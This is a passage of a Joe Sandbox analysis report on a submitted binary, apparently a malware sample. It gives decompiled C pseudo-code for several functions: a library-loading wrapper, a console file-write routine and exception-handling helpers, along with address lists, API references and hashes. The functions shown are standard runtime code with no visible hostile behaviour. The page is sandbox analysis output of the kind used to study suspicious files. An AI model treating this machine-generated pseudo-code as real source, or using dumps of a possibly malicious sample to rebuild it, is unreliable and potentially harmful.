                                                          • Snapshot File: hcaresult_1_2_400000_zjlxnt.jbxd
                                                          Similarity
                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                          • String ID: KG@
                                                          • API String ID: 885266447-1248469857
                                                          • Opcode ID: 2bd672f4b93b8e84d5363833de7c8a2a3724070b457573ba0a9a5d6950f16b0b
                                                          • Instruction ID: 0f44e613f5f007d60bd1686208b68d596087c3bd5a455358ea95eefcffa573ce
                                                          • Opcode Fuzzy Hash: 2bd672f4b93b8e84d5363833de7c8a2a3724070b457573ba0a9a5d6950f16b0b
                                                          • Instruction Fuzzy Hash: 805197B1A00149AFCF14DF99C881AEEBBB6EF89314F14806AE955B7381D338ED41DB54
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E00402633(WCHAR* _a4) {
                                                          				struct HINSTANCE__* _t4;
                                                          
                                                          				_t4 = LoadLibraryExW(_a4, 0, 0x800);
                                                          				if(_t4 != 0) {
                                                          					return _t4;
                                                          				} else {
                                                          					if(GetLastError() != 0x57 || E00406308(_a4, L"api-ms-", 7) == 0) {
                                                          						return 0;
                                                          					}
                                                          					return LoadLibraryExW(_a4, 0, 0);
                                                          				}
                                                          			}




                                                          0x00402640
                                                          0x00402648
                                                          0x0040267d
                                                          0x0040264a
                                                          0x00402653
                                                          0x00000000
                                                          0x0040267a
                                                          0x00402679
                                                          0x00402679

                                                          APIs
                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,004025E4,00000000,?,00418CC0,?,?,?,00402787,00000004,InitializeCriticalSectionEx,00411CF8,InitializeCriticalSectionEx), ref: 00402640
                                                          • GetLastError.KERNEL32(?,004025E4,00000000,?,00418CC0,?,?,?,00402787,00000004,InitializeCriticalSectionEx,00411CF8,InitializeCriticalSectionEx,00000000,?,00402507), ref: 0040264A
                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00402672
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.316635019.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.316628734.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.316670602.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.316687505.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_zjlxnt.jbxd
                                                          Similarity
                                                          • API ID: LibraryLoad$ErrorLast
                                                          • String ID: api-ms-
                                                          • API String ID: 3177248105-2084034818
                                                          • Opcode ID: f7040ae3c65c49fa5e55d5c978c18b5f47367d20220597fe9030104652494283
                                                          • Instruction ID: 6d40ff05ccc61d2f07128997f222ac600fb2d99e07b7ce153fe81ee98381cd84
                                                          • Opcode Fuzzy Hash: f7040ae3c65c49fa5e55d5c978c18b5f47367d20220597fe9030104652494283
                                                          • Instruction Fuzzy Hash: C5E01270680204B6EF201F61ED0AF993F55AB14B51F204431FB4DB41F1D7B6E850998C
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 77%
                                                          			E0040C800(intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16, intOrPtr _a20) {
                                                          				char _v16;
                                                          				signed int _v20;
                                                          				char _v28;
                                                          				signed int _v35;
                                                          				signed char _v36;
                                                          				void _v44;
                                                          				signed char* _v48;
                                                          				char _v49;
                                                          				long _v56;
                                                          				long _v60;
                                                          				intOrPtr _v64;
                                                          				struct _OVERLAPPED* _v68;
                                                          				signed int _v72;
                                                          				signed char* _v76;
                                                          				signed int _v80;
                                                          				signed int _v84;
                                                          				intOrPtr _v88;
                                                          				void _v92;
                                                          				long _v96;
                                                          				signed char* _v100;
                                                          				void* _v104;
                                                          				char _v108;
                                                          				int _v112;
                                                          				intOrPtr _v116;
                                                          				struct _OVERLAPPED* _v120;
                                                          				struct _OVERLAPPED* _v124;
                                                          				struct _OVERLAPPED* _v128;
                                                          				struct _OVERLAPPED* _v132;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				signed int _t174;
                                                          				signed int _t175;
                                                          				signed int _t177;
                                                          				signed char* _t186;
                                                          				signed int _t190;
                                                          				void* _t196;
                                                          				long _t197;
                                                          				long _t201;
                                                          				signed char* _t207;
                                                          				void _t209;
                                                          				signed char* _t214;
                                                          				void* _t221;
                                                          				signed int _t224;
                                                          				char* _t228;
                                                          				void* _t237;
                                                          				long _t243;
                                                          				signed int _t244;
                                                          				signed char* _t245;
                                                          				void* _t255;
                                                          				intOrPtr _t261;
                                                          				void* _t262;
                                                          				struct _OVERLAPPED* _t263;
                                                          				intOrPtr* _t264;
                                                          				signed int _t265;
                                                          				intOrPtr _t266;
                                                          				struct _OVERLAPPED* _t274;
                                                          				signed int _t276;
                                                          				signed char _t281;
                                                          				signed int _t285;
                                                          				signed char* _t286;
                                                          				struct _OVERLAPPED* _t289;
                                                          				void* _t292;
                                                          				signed int _t293;
                                                          				void* _t295;
                                                          				struct _OVERLAPPED* _t296;
                                                          				signed char* _t298;
                                                          				intOrPtr* _t299;
                                                          				void* _t300;
                                                          				signed int _t301;
                                                          				long _t302;
                                                          				signed int _t304;
                                                          				signed int _t305;
                                                          				void* _t306;
                                                          				void* _t307;
                                                          				void* _t308;
                                                          
                                                          				_push(0xffffffff);
                                                          				_push(0x410e99);
                                                          				_push( *[fs:0x0]);
                                                          				_t307 = _t306 - 0x74;
                                                          				_t174 =  *0x418014; // 0xb25f2588
                                                          				_t175 = _t174 ^ _t305;
                                                          				_v20 = _t175;
                                                          				_push(_t175);
                                                          				 *[fs:0x0] =  &_v16;
                                                          				_t177 = _a8;
                                                          				_t298 = _a12;
                                                          				_t261 = _a20;
                                                          				_t265 = (_t177 & 0x0000003f) * 0x38;
                                                          				_t285 = _t177 >> 6;
                                                          				_v100 = _t298;
                                                          				_v64 = _t261;
                                                          				_v72 = _t285;
                                                          				_v84 = _t265;
                                                          				_v104 =  *((intOrPtr*)(_t265 +  *((intOrPtr*)(0x418ec0 + _t285 * 4)) + 0x18));
                                                          				_v88 = _a16 + _t298;
                                                          				_v112 = GetConsoleOutputCP();
                                                          				if( *((char*)(_t261 + 0x14)) == 0) {
                                                          					E00404830(_t261, _t285);
                                                          				}
                                                          				_t299 = _a4;
                                                          				_t266 =  *((intOrPtr*)( *((intOrPtr*)(_t261 + 0xc)) + 8));
                                                          				asm("stosd");
                                                          				_v116 = _t266;
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				_t186 = _v100;
                                                          				_t286 = _t186;
                                                          				_v48 = _t286;
                                                          				if(_t186 < _v88) {
                                                          					_t293 = _v84;
                                                          					_t263 = 0;
                                                          					_v76 = 0;
                                                          					while(1) {
                                                          						_v49 =  *_t286;
                                                          						_t190 = _v72;
                                                          						_v68 = _t263;
                                                          						_v56 = 1;
                                                          						if(_t266 != 0xfde9) {
                                                          							goto L22;
                                                          						}
                                                          						_t274 = _t263;
                                                          						_t228 =  *(0x418ec0 + _t190 * 4) + 0x2e + _t293;
                                                          						_v76 = _t228;
                                                          						while( *_t228 != 0) {
                                                          							_t274 =  &(_t274->Internal);
                                                          							_t228 = _t228 + 1;
                                                          							if(_t274 < 5) {
                                                          								continue;
                                                          							}
                                                          							break;
                                                          						}
                                                          						_t295 = _v88 - _t286;
                                                          						_v56 = _t274;
                                                          						if(_t274 <= 0) {
                                                          							_t276 =  *((char*)(( *_t286 & 0x000000ff) + 0x4181c8)) + 1;
                                                          							_v80 = _t276;
                                                          							if(_t276 > _t295) {
                                                          								if(_t295 <= 0) {
                                                          									goto L44;
                                                          								} else {
                                                          									_t301 = _v84;
                                                          									do {
                                                          										 *((char*)( *((intOrPtr*)(0x418ec0 + _v72 * 4)) + _t301 + _t263 + 0x2e)) =  *((intOrPtr*)(_t263 + _t286));
                                                          										_t263 =  &(_t263->Internal);
                                                          									} while (_t263 < _t295);
                                                          									goto L43;
                                                          								}
                                                          								L52:
                                                          							} else {
                                                          								_v132 = _t263;
                                                          								_v128 = _t263;
                                                          								_v60 = _t286;
                                                          								_v56 = (_t276 == 4) + 1;
                                                          								_t237 = E0040E089( &_v132,  &_v68,  &_v60, (_t276 == 4) + 1,  &_v132, _v64);
                                                          								_t308 = _t307 + 0x14;
                                                          								if(_t237 != 0xffffffff) {
                                                          									_t293 = _v84;
                                                          									goto L21;
                                                          								}
                                                          							}
                                                          						} else {
                                                          							_t243 =  *((char*)(( *_v76 & 0x000000ff) + 0x4181c8)) + 1;
                                                          							_v60 = _t243;
                                                          							_t244 = _t243 - _t274;
                                                          							_v80 = _t244;
                                                          							if(_t244 > _t295) {
                                                          								if(_t295 > 0) {
                                                          									_t245 = _v48;
                                                          									_t302 = _v56;
                                                          									do {
                                                          										_t281 =  *((intOrPtr*)(_t263 + _t245));
                                                          										_t286 =  *((intOrPtr*)(0x418ec0 + _v72 * 4)) + _v84 + _t263;
                                                          										_t263 =  &(_t263->Internal);
                                                          										_t286[_t302 + 0x2e] = _t281;
                                                          									} while (_t263 < _t295);
                                                          									L43:
                                                          									_t299 = _a4;
                                                          								}
                                                          								L44:
                                                          								 *(_t299 + 4) =  &(( *(_t299 + 4))[_t295]);
                                                          							} else {
                                                          								_t296 = _t263;
                                                          								_t264 = _v76;
                                                          								do {
                                                          									 *((char*)(_t305 + _t296 - 0x18)) =  *_t264;
                                                          									_t296 =  &(_t296->Internal);
                                                          									_t264 = _t264 + 1;
                                                          								} while (_t296 < _t274);
                                                          								_t303 = _v80;
                                                          								_t263 = 0;
                                                          								if(_v80 > 0) {
                                                          									E00402B70( &_v28 + _t274, _t286, _t303);
                                                          									_t274 = _v56;
                                                          									_t307 = _t307 + 0xc;
                                                          								}
                                                          								_t293 = _v84;
                                                          								_t289 = _t263;
                                                          								_t304 = _v72;
                                                          								do {
                                                          									 *( *((intOrPtr*)(0x418ec0 + _t304 * 4)) + _t293 + _t289 + 0x2e) = _t263;
                                                          									_t289 =  &(_t289->Internal);
                                                          								} while (_t289 < _t274);
                                                          								_t299 = _a4;
                                                          								_v108 =  &_v28;
                                                          								_v124 = _t263;
                                                          								_v120 = _t263;
                                                          								_v56 = (_v60 == 4) + 1;
                                                          								_t255 = E0040E089( &_v124,  &_v68,  &_v108, (_v60 == 4) + 1,  &_v124, _v64);
                                                          								_t308 = _t307 + 0x14;
                                                          								if(_t255 != 0xffffffff) {
                                                          									L21:
                                                          									_t197 =  &(_v48[_v80]) - 1;
                                                          									L31:
                                                          									_v48 = _t197 + 1;
                                                          									_t201 = E00409A30(_v112, _t263,  &_v68, _v56,  &_v44, 5, _t263, _t263);
                                                          									_t307 = _t308 + 0x20;
                                                          									_v60 = _t201;
                                                          									if(_t201 != 0) {
                                                          										if(WriteFile(_v104,  &_v44, _t201,  &_v96, _t263) == 0) {
                                                          											L50:
                                                          											 *_t299 = GetLastError();
                                                          										} else {
                                                          											_t286 = _v48;
                                                          											_t207 =  *((intOrPtr*)(_t299 + 8)) - _v100 + _t286;
                                                          											_v76 = _t207;
                                                          											 *(_t299 + 4) = _t207;
                                                          											if(_v96 >= _v60) {
                                                          												if(_v49 != 0xa) {
                                                          													L38:
                                                          													if(_t286 < _v88) {
                                                          														_t266 = _v116;
                                                          														continue;
                                                          													}
                                                          												} else {
                                                          													_t209 = 0xd;
                                                          													_v92 = _t209;
                                                          													if(WriteFile(_v104,  &_v92, 1,  &_v96, _t263) == 0) {
                                                          														goto L50;
                                                          													} else {
                                                          														if(_v96 >= 1) {
                                                          															 *((intOrPtr*)(_t299 + 8)) =  *((intOrPtr*)(_t299 + 8)) + 1;
                                                          															 *(_t299 + 4) =  &(( *(_t299 + 4))[1]);
                                                          															_t286 = _v48;
                                                          															_v76 =  *(_t299 + 4);
                                                          															goto L38;
                                                          														}
                                                          													}
                                                          												}
                                                          											}
                                                          										}
                                                          									}
                                                          								}
                                                          							}
                                                          						}
                                                          						goto L51;
                                                          						L22:
                                                          						_t271 =  *(0x418ec0 + _t190 * 4);
                                                          						_v80 = _t271;
                                                          						if(( *(_t271 + _t293 + 0x2d) & 0x00000004) == 0) {
                                                          							_t271 =  *_t286 & 0x000000ff;
                                                          							if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v64 + 0xc)))) + ( *_t286 & 0x000000ff) * 2)) >= _t263) {
                                                          								_push(_v64);
                                                          								_push(1);
                                                          								_push(_t286);
                                                          								goto L29;
                                                          							} else {
                                                          								_t214 =  &(_t286[1]);
                                                          								_v60 = _t214;
                                                          								if(_t214 >= _v88) {
                                                          									 *((char*)(_v80 + _t293 + 0x2e)) =  *_t286;
                                                          									 *( *((intOrPtr*)(0x418ec0 + _v72 * 4)) + _t293 + 0x2d) =  *( *((intOrPtr*)(0x418ec0 + _v72 * 4)) + _t293 + 0x2d) | 0x00000004;
                                                          									 *(_t299 + 4) =  &(_v76[1]);
                                                          								} else {
                                                          									_t221 = E0040B944(_t271, _t286,  &_v68, _t286, 2, _v64);
                                                          									_t308 = _t307 + 0x10;
                                                          									if(_t221 != 0xffffffff) {
                                                          										_t197 = _v60;
                                                          										goto L31;
                                                          									}
                                                          								}
                                                          							}
                                                          						} else {
                                                          							_push(_v64);
                                                          							_v36 =  *(_t271 + _t293 + 0x2e) & 0x000000fb;
                                                          							_t224 =  *_t286;
                                                          							_v35 = _t224;
                                                          							 *(_t271 + _t293 + 0x2d) = _t224;
                                                          							_push(2);
                                                          							_push( &_v36);
                                                          							L29:
                                                          							_push( &_v68);
                                                          							_t196 = E0040B944(_t271, _t286);
                                                          							_t308 = _t307 + 0x10;
                                                          							if(_t196 != 0xffffffff) {
                                                          								_t197 = _v48;
                                                          								goto L31;
                                                          							}
                                                          						}
                                                          						goto L51;
                                                          					}
                                                          				}
                                                          				L51:
                                                          				 *[fs:0x0] = _v16;
                                                          				_pop(_t292);
                                                          				_pop(_t300);
                                                          				_pop(_t262);
                                                          				return E00401BE5(_t299, _t262, _v20 ^ _t305, _t286, _t292, _t300);
                                                          				goto L52;
                                                          			}















































































                                                          0x0040c805
                                                          0x0040c807
                                                          0x0040c812
                                                          0x0040c813
                                                          0x0040c816
                                                          0x0040c81b
                                                          0x0040c81d
                                                          0x0040c823
                                                          0x0040c827
                                                          0x0040c82d
                                                          0x0040c832
                                                          0x0040c838
                                                          0x0040c83b
                                                          0x0040c83e
                                                          0x0040c841
                                                          0x0040c844
                                                          0x0040c847
                                                          0x0040c851
                                                          0x0040c858
                                                          0x0040c860
                                                          0x0040c86d
                                                          0x0040c870
                                                          0x0040c874
                                                          0x0040c874
                                                          0x0040c87c
                                                          0x0040c881
                                                          0x0040c886
                                                          0x0040c887
                                                          0x0040c88a
                                                          0x0040c88b
                                                          0x0040c88c
                                                          0x0040c88f
                                                          0x0040c891
                                                          0x0040c897
                                                          0x0040c89d
                                                          0x0040c8a0
                                                          0x0040c8a2
                                                          0x0040c8a5
                                                          0x0040c8a7
                                                          0x0040c8aa
                                                          0x0040c8ad
                                                          0x0040c8b0
                                                          0x0040c8bd
                                                          0x00000000
                                                          0x00000000
                                                          0x0040c8ca
                                                          0x0040c8cf
                                                          0x0040c8d1
                                                          0x0040c8d4
                                                          0x0040c8d9
                                                          0x0040c8da
                                                          0x0040c8de
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0040c8de
                                                          0x0040c8e3
                                                          0x0040c8e5
                                                          0x0040c8ea
                                                          0x0040c99e
                                                          0x0040c99f
                                                          0x0040c9a4
                                                          0x0040cb5e
                                                          0x00000000
                                                          0x0040cb60
                                                          0x0040cb60
                                                          0x0040cb63
                                                          0x0040cb72
                                                          0x0040cb76
                                                          0x0040cb77
                                                          0x00000000
                                                          0x0040cb7b
                                                          0x00000000
                                                          0x0040c9aa
                                                          0x0040c9af
                                                          0x0040c9b5
                                                          0x0040c9bb
                                                          0x0040c9c4
                                                          0x0040c9cf
                                                          0x0040c9d4
                                                          0x0040c9da
                                                          0x0040c9e0
                                                          0x00000000
                                                          0x0040c9e0
                                                          0x0040c9da
                                                          0x0040c8f0
                                                          0x0040c8fd
                                                          0x0040c8fe
                                                          0x0040c901
                                                          0x0040c903
                                                          0x0040c908
                                                          0x0040cb31
                                                          0x0040cb33
                                                          0x0040cb36
                                                          0x0040cb39
                                                          0x0040cb46
                                                          0x0040cb49
                                                          0x0040cb4b
                                                          0x0040cb4c
                                                          0x0040cb50
                                                          0x0040cb54
                                                          0x0040cb54
                                                          0x0040cb54
                                                          0x0040cb57
                                                          0x0040cb57
                                                          0x0040c90e
                                                          0x0040c90e
                                                          0x0040c910
                                                          0x0040c913
                                                          0x0040c915
                                                          0x0040c919
                                                          0x0040c91a
                                                          0x0040c91b
                                                          0x0040c91f
                                                          0x0040c922
                                                          0x0040c926
                                                          0x0040c930
                                                          0x0040c935
                                                          0x0040c938
                                                          0x0040c938
                                                          0x0040c93b
                                                          0x0040c93e
                                                          0x0040c940
                                                          0x0040c943
                                                          0x0040c94c
                                                          0x0040c950
                                                          0x0040c951
                                                          0x0040c958
                                                          0x0040c95e
                                                          0x0040c966
                                                          0x0040c971
                                                          0x0040c976
                                                          0x0040c981
                                                          0x0040c986
                                                          0x0040c98c
                                                          0x0040c9e3
                                                          0x0040c9e9
                                                          0x0040ca7e
                                                          0x0040ca83
                                                          0x0040ca95
                                                          0x0040ca9a
                                                          0x0040ca9d
                                                          0x0040caa2
                                                          0x0040cabd
                                                          0x0040cb9e
                                                          0x0040cba4
                                                          0x0040cac3
                                                          0x0040cac9
                                                          0x0040cacc
                                                          0x0040cace
                                                          0x0040cad1
                                                          0x0040cada
                                                          0x0040cae4
                                                          0x0040cb22
                                                          0x0040cb25
                                                          0x0040cb27
                                                          0x00000000
                                                          0x0040cb27
                                                          0x0040cae6
                                                          0x0040cae8
                                                          0x0040caea
                                                          0x0040cb03
                                                          0x00000000
                                                          0x0040cb09
                                                          0x0040cb0d
                                                          0x0040cb13
                                                          0x0040cb16
                                                          0x0040cb1c
                                                          0x0040cb1f
                                                          0x00000000
                                                          0x0040cb1f
                                                          0x0040cb0d
                                                          0x0040cb03
                                                          0x0040cae4
                                                          0x0040cada
                                                          0x0040cabd
                                                          0x0040caa2
                                                          0x0040c98c
                                                          0x0040c908
                                                          0x00000000
                                                          0x0040c9ef
                                                          0x0040c9ef
                                                          0x0040c9f6
                                                          0x0040ca00
                                                          0x0040ca23
                                                          0x0040ca2f
                                                          0x0040ca60
                                                          0x0040ca63
                                                          0x0040ca65
                                                          0x00000000
                                                          0x0040ca31
                                                          0x0040ca31
                                                          0x0040ca34
                                                          0x0040ca3a
                                                          0x0040cb82
                                                          0x0040cb90
                                                          0x0040cb99
                                                          0x0040ca40
                                                          0x0040ca4a
                                                          0x0040ca4f
                                                          0x0040ca55
                                                          0x0040ca5b
                                                          0x00000000
                                                          0x0040ca5b
                                                          0x0040ca55
                                                          0x0040ca3a
                                                          0x0040ca02
                                                          0x0040ca09
                                                          0x0040ca0c
                                                          0x0040ca0f
                                                          0x0040ca11
                                                          0x0040ca14
                                                          0x0040ca1b
                                                          0x0040ca1d
                                                          0x0040ca66
                                                          0x0040ca69
                                                          0x0040ca6a
                                                          0x0040ca6f
                                                          0x0040ca75
                                                          0x0040ca7b
                                                          0x00000000
                                                          0x0040ca7b
                                                          0x0040ca75
                                                          0x00000000
                                                          0x0040ca00
                                                          0x0040c8a5
                                                          0x0040cba6
                                                          0x0040cbab
                                                          0x0040cbb3
                                                          0x0040cbb4
                                                          0x0040cbb5
                                                          0x0040cbc1
                                                          0x00000000

                                                          APIs
                                                          • GetConsoleOutputCP.KERNEL32(B25F2588,00000000,00000000,?), ref: 0040C863
                                                            • Part of subcall function 00409A30: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0040DBAF,?,00000000,-00000008), ref: 00409A91
                                                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040CAB5
                                                          • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 0040CAFB
                                                          • GetLastError.KERNEL32 ref: 0040CB9E
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.316635019.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.316628734.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.316670602.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.316687505.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_zjlxnt.jbxd
                                                          Similarity
                                                          • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                          • String ID:
                                                          • API String ID: 2112829910-0
                                                          • Opcode ID: 38a055b8fd170a2096d220b3596d05f387b3e6599db676eaaa1279edd9b21f10
                                                          • Instruction ID: afab75ee4df23f5baa2d1639ff9ca2ddc2c0c3524feb2627a88473823ce8a792
                                                          • Opcode Fuzzy Hash: 38a055b8fd170a2096d220b3596d05f387b3e6599db676eaaa1279edd9b21f10
                                                          • Instruction Fuzzy Hash: CED168B5D00248DFCB15CFA8D8C1AEDBBB5EF09314F28822AE455FB391D634A941CB58
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 66%
                                                          			E004030E4(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                          				signed int* _t52;
                                                          				signed int _t53;
                                                          				intOrPtr _t54;
                                                          				signed int _t58;
                                                          				signed int _t61;
                                                          				intOrPtr _t71;
                                                          				signed int _t75;
                                                          				signed int _t79;
                                                          				signed int _t81;
                                                          				signed int _t84;
                                                          				signed int _t85;
                                                          				signed int _t97;
                                                          				signed int* _t98;
                                                          				signed char* _t101;
                                                          				signed int _t107;
                                                          				void* _t111;
                                                          
                                                          				_push(0x10);
                                                          				_push(0x4165c8);
                                                          				E004019C0(__ebx, __edi, __esi);
                                                          				_t75 = 0;
                                                          				_t52 =  *(_t111 + 0x10);
                                                          				_t81 = _t52[1];
                                                          				if(_t81 == 0 ||  *((intOrPtr*)(_t81 + 8)) == 0) {
                                                          					L30:
                                                          					_t53 = 0;
                                                          					__eflags = 0;
                                                          					goto L31;
                                                          				} else {
                                                          					_t97 = _t52[2];
                                                          					if(_t97 != 0 ||  *_t52 < 0) {
                                                          						_t84 =  *_t52;
                                                          						_t107 =  *(_t111 + 0xc);
                                                          						if(_t84 >= 0) {
                                                          							_t107 = _t107 + 0xc + _t97;
                                                          						}
                                                          						 *(_t111 - 4) = _t75;
                                                          						_t101 =  *(_t111 + 0x14);
                                                          						if(_t84 >= 0 || ( *_t101 & 0x00000010) == 0) {
                                                          							L10:
                                                          							_t54 =  *((intOrPtr*)(_t111 + 8));
                                                          							__eflags = _t84 & 0x00000008;
                                                          							if((_t84 & 0x00000008) == 0) {
                                                          								__eflags =  *_t101 & 0x00000001;
                                                          								if(( *_t101 & 0x00000001) == 0) {
                                                          									_t84 =  *(_t54 + 0x18);
                                                          									__eflags = _t101[0x18] - _t75;
                                                          									if(_t101[0x18] != _t75) {
                                                          										__eflags = _t84;
                                                          										if(_t84 == 0) {
                                                          											goto L32;
                                                          										} else {
                                                          											__eflags = _t107;
                                                          											if(_t107 == 0) {
                                                          												goto L32;
                                                          											} else {
                                                          												__eflags =  *_t101 & 0x00000004;
                                                          												_t79 = 0;
                                                          												_t75 = (_t79 & 0xffffff00 | ( *_t101 & 0x00000004) != 0x00000000) + 1;
                                                          												__eflags = _t75;
                                                          												 *(_t111 - 0x20) = _t75;
                                                          												goto L29;
                                                          											}
                                                          										}
                                                          									} else {
                                                          										__eflags = _t84;
                                                          										if(_t84 == 0) {
                                                          											goto L32;
                                                          										} else {
                                                          											__eflags = _t107;
                                                          											if(_t107 == 0) {
                                                          												goto L32;
                                                          											} else {
                                                          												E00402B70(_t107, E0040205C(_t84,  &(_t101[8])), _t101[0x14]);
                                                          												goto L29;
                                                          											}
                                                          										}
                                                          									}
                                                          								} else {
                                                          									__eflags =  *(_t54 + 0x18);
                                                          									if( *(_t54 + 0x18) == 0) {
                                                          										goto L32;
                                                          									} else {
                                                          										__eflags = _t107;
                                                          										if(_t107 == 0) {
                                                          											goto L32;
                                                          										} else {
                                                          											E00402B70(_t107,  *(_t54 + 0x18), _t101[0x14]);
                                                          											__eflags = _t101[0x14] - 4;
                                                          											if(_t101[0x14] == 4) {
                                                          												__eflags =  *_t107;
                                                          												if( *_t107 != 0) {
                                                          													_push( &(_t101[8]));
                                                          													_push( *_t107);
                                                          													goto L21;
                                                          												}
                                                          											}
                                                          											goto L29;
                                                          										}
                                                          									}
                                                          								}
                                                          							} else {
                                                          								_t84 =  *(_t54 + 0x18);
                                                          								goto L12;
                                                          							}
                                                          						} else {
                                                          							_t71 =  *0x418c94; // 0x0
                                                          							 *((intOrPtr*)(_t111 - 0x1c)) = _t71;
                                                          							if(_t71 == 0) {
                                                          								goto L10;
                                                          							} else {
                                                          								 *0x4111f0();
                                                          								_t84 =  *((intOrPtr*)(_t111 - 0x1c))();
                                                          								L12:
                                                          								if(_t84 == 0 || _t107 == 0) {
                                                          									L32:
                                                          									E0040623E(_t75, _t84, _t97, _t107);
                                                          									asm("int3");
                                                          									_push(8);
                                                          									_push(0x4165e8);
                                                          									E004019C0(_t75, _t101, _t107);
                                                          									_t98 =  *(_t111 + 0x10);
                                                          									_t85 =  *(_t111 + 0xc);
                                                          									__eflags =  *_t98;
                                                          									if(__eflags >= 0) {
                                                          										_t103 = _t85 + 0xc + _t98[2];
                                                          										__eflags = _t85 + 0xc + _t98[2];
                                                          									} else {
                                                          										_t103 = _t85;
                                                          									}
                                                          									 *(_t111 - 4) =  *(_t111 - 4) & 0x00000000;
                                                          									_t108 =  *(_t111 + 0x14);
                                                          									_push( *(_t111 + 0x14));
                                                          									_push(_t98);
                                                          									_push(_t85);
                                                          									_t77 =  *((intOrPtr*)(_t111 + 8));
                                                          									_push( *((intOrPtr*)(_t111 + 8)));
                                                          									_t58 = E004030E4(_t77, _t103, _t108, __eflags) - 1;
                                                          									__eflags = _t58;
                                                          									if(_t58 == 0) {
                                                          										_t61 = E00403E54(_t103, _t108[0x18], E0040205C( *((intOrPtr*)(_t77 + 0x18)),  &(_t108[8])));
                                                          									} else {
                                                          										_t61 = _t58 - 1;
                                                          										__eflags = _t61;
                                                          										if(_t61 == 0) {
                                                          											_t61 = E00403E64(_t103, _t108[0x18], E0040205C( *((intOrPtr*)(_t77 + 0x18)),  &(_t108[8])), 1);
                                                          										}
                                                          									}
                                                          									 *(_t111 - 4) = 0xfffffffe;
                                                          									 *[fs:0x0] =  *((intOrPtr*)(_t111 - 0x10));
                                                          									return _t61;
                                                          								} else {
                                                          									 *_t107 = _t84;
                                                          									_push( &(_t101[8]));
                                                          									_push(_t84);
                                                          									L21:
                                                          									 *_t107 = E0040205C();
                                                          									L29:
                                                          									 *(_t111 - 4) = 0xfffffffe;
                                                          									_t53 = _t75;
                                                          									L31:
                                                          									 *[fs:0x0] =  *((intOrPtr*)(_t111 - 0x10));
                                                          									return _t53;
                                                          								}
                                                          							}
                                                          						}
                                                          					} else {
                                                          						goto L30;
                                                          					}
                                                          				}
                                                          			}



















                                                          0x004030e4
                                                          0x004030e6
                                                          0x004030eb
                                                          0x004030f0
                                                          0x004030f2
                                                          0x004030f5
                                                          0x004030fa
                                                          0x0040320a
                                                          0x0040320a
                                                          0x0040320a
                                                          0x00000000
                                                          0x00403109
                                                          0x00403109
                                                          0x0040310e
                                                          0x00403118
                                                          0x0040311a
                                                          0x0040311f
                                                          0x00403124
                                                          0x00403124
                                                          0x00403126
                                                          0x00403129
                                                          0x0040312e
                                                          0x00403150
                                                          0x00403150
                                                          0x00403153
                                                          0x00403156
                                                          0x00403174
                                                          0x00403177
                                                          0x004031b6
                                                          0x004031b9
                                                          0x004031bc
                                                          0x004031e1
                                                          0x004031e3
                                                          0x00000000
                                                          0x004031e5
                                                          0x004031e5
                                                          0x004031e7
                                                          0x00000000
                                                          0x004031e9
                                                          0x004031e9
                                                          0x004031ee
                                                          0x004031f2
                                                          0x004031f2
                                                          0x004031f3
                                                          0x00000000
                                                          0x004031f3
                                                          0x004031e7
                                                          0x004031be
                                                          0x004031be
                                                          0x004031c0
                                                          0x00000000
                                                          0x004031c2
                                                          0x004031c2
                                                          0x004031c4
                                                          0x00000000
                                                          0x004031c6
                                                          0x004031d7
                                                          0x00000000
                                                          0x004031dc
                                                          0x004031c4
                                                          0x004031c0
                                                          0x00403179
                                                          0x00403179
                                                          0x0040317d
                                                          0x00000000
                                                          0x00403183
                                                          0x00403183
                                                          0x00403185
                                                          0x00000000
                                                          0x0040318b
                                                          0x00403192
                                                          0x0040319a
                                                          0x0040319e
                                                          0x004031a0
                                                          0x004031a3
                                                          0x004031a8
                                                          0x004031a9
                                                          0x00000000
                                                          0x004031a9
                                                          0x004031a3
                                                          0x00000000
                                                          0x0040319e
                                                          0x00403185
                                                          0x0040317d
                                                          0x00403158
                                                          0x00403158
                                                          0x00000000
                                                          0x00403158
                                                          0x00403135
                                                          0x00403135
                                                          0x0040313a
                                                          0x0040313f
                                                          0x00000000
                                                          0x00403141
                                                          0x00403143
                                                          0x0040314c
                                                          0x0040315b
                                                          0x0040315d
                                                          0x0040321c
                                                          0x0040321c
                                                          0x00403221
                                                          0x00403222
                                                          0x00403224
                                                          0x00403229
                                                          0x0040322e
                                                          0x00403231
                                                          0x00403234
                                                          0x00403237
                                                          0x00403240
